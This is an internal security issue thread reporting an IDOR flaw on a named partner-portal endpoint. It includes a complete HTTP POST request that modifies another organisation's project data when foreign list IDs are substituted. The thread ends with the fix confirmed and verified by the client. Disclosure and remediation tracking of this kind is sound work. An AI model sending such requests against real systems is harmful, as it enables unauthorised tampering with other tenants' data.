### ISSUE TITLE
SEC-4942 - IDOR on /api/SaveProjectInfo endpoint

### ISSUE THREAD

**Issue by prashantjadhav92** [MindMatrix/SecurityTracker#119]
IDOR on /api/SaveProjectInfo endpoint

Steps to reproduce:
Make the following request (replace parameters listid and distributionid parameters with ids of list in another org):

POST /api/SaveProjectInfo HTTP/2
Host: partners.acronis.com
Cookie:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Csrf-Token:
X-Requested-With: XMLHttpRequest
Content-Length: 91
Origin: https://partners.acronis.com
Referer: https://partners.acronis.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"listid":{LIST_ID},"distributionid":{DISTRIBUTION_LIST_ID},"name":"h1","desc":"eeeeee","filters":"","cstatus":1}

See data changed

Fix: it must not be possible to change data of other organizations

**Comment by PuneetRevclerx** [comment]
@shaileshtayde sir, above issue is similar to #122

**Comment by MeghanaThakekar** [comment]
@PuneetRevclerx @PuneetRevclerx - please check this on main

**Comment by PuneetRevclerx** [comment]
@MeghanaThakekar Mam, I have checked above issue on mm live and it's working as expected now.

**Comment by PuneetRevclerx** [comment]
@prashantjadhav92 sir, I have checked above security issue on Acronis production and it's working as expected now.

**Comment by prashantjadhav92** [comment]
@PuneetRevclerx I have asked the client to verify.

**Comment by prashantjadhav92** [comment]
Verified by the client.
